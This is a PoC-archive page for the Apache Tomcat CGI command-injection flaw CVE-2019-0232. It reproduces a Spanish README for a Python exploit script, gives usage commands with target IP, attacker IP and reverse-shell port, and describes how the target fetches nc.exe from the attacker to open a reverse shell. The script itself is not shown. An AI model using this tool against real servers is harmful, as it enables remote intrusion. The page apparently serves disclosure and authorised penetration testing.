关联漏洞
标题:
Apache Tomcat 操作系统命令注入漏洞
(CVE-2019-0232)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 9.0.0.M1版本至9.0.17版本、8.5.0版本至8.5.39版本和7.0.0版本至7.0.93版本中的CGI Servlet存在操作系统命令注入漏洞。远程攻击者可利用该漏洞执行代码。
介绍
# Script de Exploit CGI de Apache Tomcat
## Descripción
Un script de Python diseñado para explotar vulnerabilidades CGI en servidores Apache Tomcat mediante la ejecución de una conexión de shell inversa.
## Ejemplo de Uso

## Características
- Exploit automatizado para vulnerabilidades CGI de Apache Tomcat
- Parámetros de objetivo y atacante personalizables
- Interfaz de línea de comandos sencilla
## Requisitos Previos
- Python 3.x
- Biblioteca `requests`
- Netcat (nc.exe)
- Acceso a un listener para recibir el shell inverso
## Instalación
```bash
git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests
```
## Uso
```bash
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>
```
### Argumentos Obligatorios
- `-t, --target`: Dirección IP del objetivo con Apache Tomcat
- `-i, --ip`: Dirección IP del atacante que aloja nc.exe
- `-ncp, --nc-port`: Puerto para la conexión de shell inverso
### Argumentos Opcionales
- `-p, --port`: Puerto del objetivo (por defecto: 8080)
- `-sp, --server-port`: Puerto del servidor para alojar nc.exe (por defecto: 80)
- `-cgi, --cgi-script`: Nombre del script CGI a explotar (por defecto: cmd.bat)
## Ejemplo
```bash
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444
```
## Descargo de Responsabilidad Legal
Esta herramienta se proporciona únicamente para propósitos educativos y pruebas de penetración autorizadas. El autor y los colaboradores no son responsables de ningún mal uso o daño causado por este script. Siempre obtenga autorización adecuada antes de probar cualquier sistema.
## Autor
- Jose Miguel Romero (k3Pn1c)
文件快照
[4.0K] /data/pocs/8dbacd1bb6fbbc8b6b3bfbfd70692159803599af
├── [4.0K] assets
│ ├── [ 92K] exploit.png
│ └── [ 58K] nc.exe
├── [1.7K] README.md
└── [2.2K] tomcat_cgi_exploit.py
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。